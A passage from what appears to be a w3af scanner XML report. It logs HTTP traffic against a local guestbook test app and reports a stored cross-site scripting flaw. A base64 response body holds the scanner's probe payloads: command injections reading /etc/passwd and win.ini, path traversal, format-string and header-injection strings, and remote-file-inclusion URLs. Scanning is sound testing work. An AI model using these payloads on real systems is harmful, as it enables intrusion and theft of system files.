                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="365">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[798, 1175]" name="Persistent Cross-Site Scripting vulnerability" plugin="xss" url="http://192.168.0.116:31337/post">
        <description>A persistent Cross Site Scripting vulnerability was found by sending &quot;gny4i&lt;/-&gt;&quot; to the &quot;pseudo&quot; parameter at http://192.168.0.116:31337/post, which is echoed when browsing to http://192.168.0.116:31337/. This vulnerability was found in the requests with ids 798 and 1175.</description>
        <http-transactions>
            <http-transaction id="798">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="44" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz1nbnk0aSUzQyUyRi0lM0U=
</body>
                </httprequest>
                <httpresponse id="798">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1175">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="1175">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="base64">ICAgIDxwPjxhIGhyZWY9Jy9wb3N0Jz5sZWF2ZSBhIG1lc3NhZ2UhPC9hPjwvcD4KICAgIDxociAv
PgogICAgICAgIDxwPm1hbm55PC9wPgogICAgICAgIDxwPmJlYXV0aWZ1bCB3ZWJzaXRlITwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD5tYW5ueTwvcD4KICAgICAgICA8cD5pJ3ZlIGdvdCBu
b3RoaW5nIGVsc2UgdG8gZG88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAg
ICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5SZXNwb25zZS5Xcml0
ZShuZXcgU3RyaW5nPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlJlc3BvbnNlLldyaXRlKG5ldyBTdHJpbmco
InJrZHhqIiw1KSk8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9w
YXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+dHlwZSAlU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD4mJi9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiYmL2Jpbi9jYXQgL2V0
Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JiZ0eXBlICVTWVNURU1ST09U
JXdpbi5pbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD4mJnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD58L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+fC9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPnx0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHR5cGUgJVNZ
U1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD47L2Jpbi9jYXQg
L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Oy9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjt0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+O3R5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5gL2Jpbi9jYXQgL2V0Yy9wYXNzd2RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmAvYmlu
L2NhdCAvZXRjL3Bhc3N3ZGA8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cnVuIHR5cGUg
JVNZU1RFTVJPT1Qld2luLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5ydW4gdHlwZSAlU1lTVEVNUk9PVCV3
aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjg1MTE4MjM1PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnBvc3Q8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+cG9zdDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkADwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0
Yy9wYXNzd2QALmh0bWw8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+L2V0Yy9wYXNzd2QAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi9ldGMvcGFzc3dkADwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD4vZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4v
ZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pAC5odG1sPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPkM6CG9vdC5pbmk8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
QzoIb290LmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5D
Oghvb3QuaW5pAC5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkM6CG9vdC5pbmkALmh0bWw8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD4lU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVT
WVNURU1ST09UJXdpbi5pbmkAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkA
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkALmh0bWw8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NDExMTYxODU8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaQAuaHRtbDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YSkvKS8pLykvKS8pLykvKS8pLykvKS8p
LzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5hKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS88L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+aFR0cDovL3czYWYub3JnLzwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5oVHRwOi8vdzNhZi5vcmcvPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmh0VHBz
Oi8vdzNhZi5vcmcvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmh0VHBzOi8vdzNhZi5vcmcvPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPmZUcDovL3czYWYub3JnLzwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5m
VHA6Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+dllVWm1oOFU8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JW48L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+JW48L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JW4lbiVuJW4l
biVuJW4lbiVuJW48L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVuJW4lbiVuJW48L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJTwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5waW5nIC1u
IDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiU8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW48L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+XigjJCFAIyQpKCgpKSkqKioqKio8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
XigjJCFAIyQpKCgpKSkqKioqKio8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+aHR0cDovL3d3dy53M2FmLm9yZy88L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+aHR0cDovL3d3dy53M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
Ly93M2FmLm9yZzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vL3czYWYub3JnPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjwhLS08L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+PCEtLTwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5GNzVKbXlZazwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4iPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiI8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+aURvbnRFeGlzdDwvcD4KICAgICAgICA8cD5IZWxsbyBX
b3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5pRG9u
dEV4aXN0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+dzNhZg0KdnVsbmVyYWJsZTA3M2I6IGFlNTwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD53M2FmDQp2dWxuZXJhYmxlMDczYjogYWU1Y3czYWY8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+dzNhZg12dWxuZXJhYmxlMDczYjogYWU1YzwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD53M2FmDXZ1bG5lcmFibGUwNzNiOiBhZTVjdzNhZjwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD53M2FmCnZ1bG5lcmFibGUwNzNiOiBhZTVjPC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPncz
YWYKdnVsbmVyYWJsZTA3M2I6IGFlNWN3M2FmPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5zbGVlcCgz
KTs8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+c2xlZXAoMyk7PC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPmdueTRpPC8tPjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD5zcWdybi8qPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjV0bTgwIjV0bTgwPC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmJzZWhyYGJzZWhyPC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnVyc2t1ID08
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
aHR0cDovL3czYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmh0dHA6Ly93M2FmLm9y
Zy9yZmkuaHRtbDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD53M2FmLm9yZy9yZmkuaHRt
bDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD53M2FmLm9yZy9yZmkuaHRtbDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5oVHRQOi8vdzNhZi5vcmcvcmZpLmh0bWw8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+aFR0
UDovL3czYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PnBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+cnUyZnQ8Ly0+
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPnFyOWxoLyo8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+d2xyc21gd2xy
c208L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+M2VydWsi
M2VydWs8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+bjhl
MnEgPTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4vdXNy
L3NiaW4vcGluZyAtcyBsb2NhbGhvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPlRocmVhZC5zbGVlcCgzMDAw
